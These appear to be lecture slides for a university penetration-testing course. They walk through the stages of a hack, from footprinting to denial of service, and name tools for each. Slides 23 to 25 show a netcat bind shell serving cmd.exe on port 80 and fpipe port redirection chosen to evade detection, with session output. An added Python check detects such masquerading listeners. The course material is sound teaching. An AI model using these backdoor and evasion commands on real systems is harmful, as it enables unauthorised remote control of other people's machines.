Slide 1: Penetration Testing
C. Edward Chow, cs691
Slide 2: Outline of The Talk
- Definition, Concepts on Penetration Testing/Hacking
- Anatomy of a Hack
- Framework for penetration studies
- Skills and Requirements of a Penetration Tester
- SAN list of Security Holes
- Internet Penetration
- Dial up Penetration
- Internal Penetration
References:
- Chapter 23 Vulnerability Analysis, by Matt Bishop.
- Hack I.T., Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta.
- Hacking Exposed, by Stuart McClure, Joel Scambray and George Kurtz, http://www.hackingexposed.com/win2k/links.html
Slide 3: Definition
- Vulnerability (Security Flaw): a specific failure of the system to guard against unauthorized access or actions. It can be in procedures, technology (SW or HW), or management. Using the failure of the system to violate the site security policy is called exploiting the vulnerability.
- Penetration Study: a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
- Penetration Testing: an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
- Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system. It is not a proof technique: it can never prove the absence of security flaws, only their presence.
- Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disrupting or denying the availability of objects.
- What is the difference between penetration testing and hacking/intrusion?
Slide 4: More Thorough Penetration Study
- A more thorough penetration study finds the proper interpretation of the vulnerabilities found and draws conclusions on the care taken in the design and implementation.
- A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.
- In practice, constraints (resources, money, time) affect the penetration study.
Slide 5: Hacking Methodology (Steps)
An excellent description is inside the back cover page of the "Hacking Exposed" text by McClure et al.
- Footprinting: whois, nslookup
- Scanning: Nmap, fping
- Enumeration: dumpACL, showmount, legion, rpcinfo
- Gaining Access: Tcpdump, L0phtcrack, NAT
- Escalating Privilege: John the Ripper, getadmin
- Pilfering: Rhosts, user data, config files, registry
- Covering Tracks: zap, rootkits
- Creating Back Doors: Cron, at, startup folder, netcat, keystroke logger, remote desktop
- Denial of Service: Synk4, ping of death, tfn/stacheldraht
Slide 6: Footprinting
- Information gathering. Sam Spade is a Windows-based network query tool.
- Find out the target IP address/phone number range. Why check phone numbers?
- Namespace acquisition. Network topology (VisualRoute).
- It is essential to a "surgical" attack. The key here is not to miss any details.
- Note that for the penetration tester, this step is to avoid testing others instead of your client and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).
- Defense: deploy NIDS (snort), RotoRouter.
Techniques and tools:
- Open source search: Google, search engines, Edgar
- Find domain name, admin, IP addresses, name servers: Whois (Network Solutions; arin)
- DNS zone transfer: Nslookup (ls -d), dig, Sam Spade
Slide 7: Scanning
- Bulk target assessment: which machines are up and what ports (services) are open.
- Focus on the most promising avenues of entry.
- To avoid being detected, these tools can reduce the frequency of packet sending and randomize the order of ports or IP addresses scanned.
- Note that some machines do not respond to ping but respond to requests to ports that are actually open. Ardor is an example.
Techniques and tools:
- Ping sweep: Fping, icmpenum, WS_Ping ProPack, nmap
- TCP/UDP port scan: Nmap, Superscan, fscan
- OS detection: Nmap, queso, siphon
Slide 8: Enumeration
- Identify valid user accounts or poorly protected resource shares.
- More intrusive probing than the scanning step.
Techniques and tools:
- List user accounts: Null sessions, DumpACL, Sid2user, onSiteAdmin
- List file shares: Showmount, NAT, legion
- Identify applications: Banner grabbing with telnet or netcat, rpcinfo, netcat
Slide 9: Gaining Access
Based on the information gathered so far, make an informed attempt to access the target.
Techniques and tools:
- Password eavesdropping: Tcpdump/ssldump, L0phtcrack readsmb
- File share brute forcing: NAT, legion
- Password file grab: Tftp, Pwdump2 (NT)
- Buffer overflow: Ttdb, bind, IIS .HTR/ISM.DLL
Slide 10: Escalating Privilege
If only user-level access was obtained in the last step, seek to gain complete control of the system.
Techniques and tools:
- Password cracking: John the Ripper, L0phtcrack
- Known exploits: Lc_messages, Getadmin, sechole
Slide 11: Pilfering
Webster's Revised Unabridged Dictionary (1913): Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.
Gather information to identify mechanisms that allow access to trusted systems.
Techniques and tools:
- Evaluate trusts: rhosts, LSA secrets
- Search for cleartext passwords: user data, configuration files, registry
Slide 12: Covering Tracks
Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.
Techniques and tools:
- Clear logs: Zap, Event Log GUI
- Hide tools: Rootkits, file streaming
Slide 13: Creating Back Doors
Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.
Techniques and tools:
- Create rogue user accounts: members of wheel, admin
- Schedule batch jobs: Cron, AT
- Infect startup files: rc, startup folder, registry keys
- Plant remote control services: Netcat, remote.exe, VNC, B02K, remote desktop
- Install monitoring mechanisms: keystroke loggers, add acct. to secadmin mail aliases
- Replace apps with Trojans: Login, fpnwclnt.dll
Slide 14: Denial of Service
If the attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.
Techniques and tools:
- SYN flood: synk4
- ICMP techniques: Ping of death, smurf
- Identical src/dst SYN requests: Land, Latierra
- Overlapping fragment/offset bugs
- Out of bounds TCP options (OOB)
- DDoS: Trinoo, TFN, stacheldraht
Slide 15: Nessus: Integrated Security Scanning Tool
- Originally designed by Renaud Deraison.
- Available at www.nessus.org
- Main scanning engine runs on a Unix server with a client GUI running on Unix or Windows.
- Pretty good control and reporting.
- Includes a scripting language for plug-ins (detecting additional attacks).
- http://www.nessus.org/pres/bh2001/index.html
Slide 22: Setting up Backdoor Connection
- Once admin privilege is obtained, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).
- Port redirection accepts packets on one port and sends them out over another port. It can be used to get past a packet-filtering firewall.
- We will use netcat and fpipe to illustrate the concept.
- Netcat is available at http://www.atstake.com/research/tools/network_utilities/
- Fpipe is available at http://www.foundstone.com
Slide 23: Setup Netcat
    C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
    listening on [128.198.177.63] 80...
    connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
    listening on [128.198.177.63] 80...
    connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
Here we bind to port 80. You can also use port 139. The idea is to use a well-known port to avoid detection. -L is used to listen again after a connection is terminated. The nc command receives a command from packets arriving on port 80, runs it with cmd.exe, and sends back the execution result.
Slide 24: Setup FPIPE
    C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
    FPipe v2.1 - TCP/UDP port redirector.
    Copyright 2000 (c) by Foundstone, Inc.
    http://www.foundstone.com
    Pipe connected:
         In: 128.198.162.60:58797 --> 128.198.177.63:53
        Out: 128.198.168.63:53 --> 128.198.177.63:80
    Pipe connected:
         In: 128.198.162.60:58801 --> 128.198.177.63:53
        Out: 128.198.177.63:53 --> 128.198.177.63:80
Here the fpipe program listens for packets coming from blanca to port 53 and relays them to port 80 on 128.198.177.63, using port 53 (DNS) as the source port to avoid detection.
Slide 25: Telnet to the relay host
    C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53
    Trying 128.198.168.63...
    Connected to vivian (128.198.168.63).
    Escape character is '^]'.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\work\cucs\cs522\project>dir
    dir
     Volume in drive C is S3A1203D501
     Volume Serial Number is 503B-9F00
     Directory of C:\work\cucs\cs522\project
    04/29/2003  12:56 PM    <DIR>          .
    04/29/2003  12:56 PM    <DIR>          ..
    04/29/2003  12:50 PM           371,208 erniestInfocom2000.ps
    04/29/2003  12:52 PM           204,590 ernstInfocom2000.pdf
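Slides 22 to 25 rely on a listener or redirector sitting on a well-known port (80, 53, 139) so that it blends in. As an added example that is not part of the original slides, the following Python check takes the defender's view: it parses constructed `netstat -ano`-style output, looks up the owning process of each TCP listener, and flags well-known ports owned by an image that is not the expected server for that port. The process-name map, the sample lines and the table of expected owners are all assumptions constructed for the example; process names can be renamed by an intruder, so treat a clean result as a weak signal and a hit as something to investigate.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape of Windows `netstat -ano` output (not from the slides).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    128.198.177.63:80      0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:53             0.0.0.0:0              LISTENING       2288
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
"""

# Constructed PID -> image name map, as `tasklist` would report it (hypothetical values).
SAMPLE_PROCESSES: Dict[int, str] = {1204: "nc.exe", 2288: "fpipe.exe", 900: "svchost.exe", 4: "System"}

# Images that are legitimately expected to own each well-known port on a Windows host
# (assumed policy for this example; adapt it to the hosts you actually run).
EXPECTED_OWNERS: Dict[int, set] = {
    80: {"httpd.exe", "inetinfo.exe", "w3wp.exe"},
    53: {"dns.exe"},
    135: {"svchost.exe"},
    139: {"System"},
    445: {"System"},
}

# Matches one TCP LISTENING row: local port and owning PID are captured.
LISTEN_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_text: str) -> List[Tuple[int, int]]:
    """Return (port, pid) for every TCP LISTENING line; other rows are ignored."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            found.append((int(m.group(1)), int(m.group(2))))
    return found


def find_masquerading_listeners(netstat_text: str, processes: Dict[int, str]) -> List[Tuple[int, int, str]]:
    """Flag listeners on well-known ports whose owning image is not an expected server."""
    findings = []
    for port, pid in parse_listeners(netstat_text):
        expected = EXPECTED_OWNERS.get(port)
        if expected is None:          # not a port we have a policy for
            continue
        image = processes.get(pid, "<unknown>")
        if image not in expected:
            findings.append((port, pid, image))
    return findings
```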
Slide 26: Layering of Tests
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.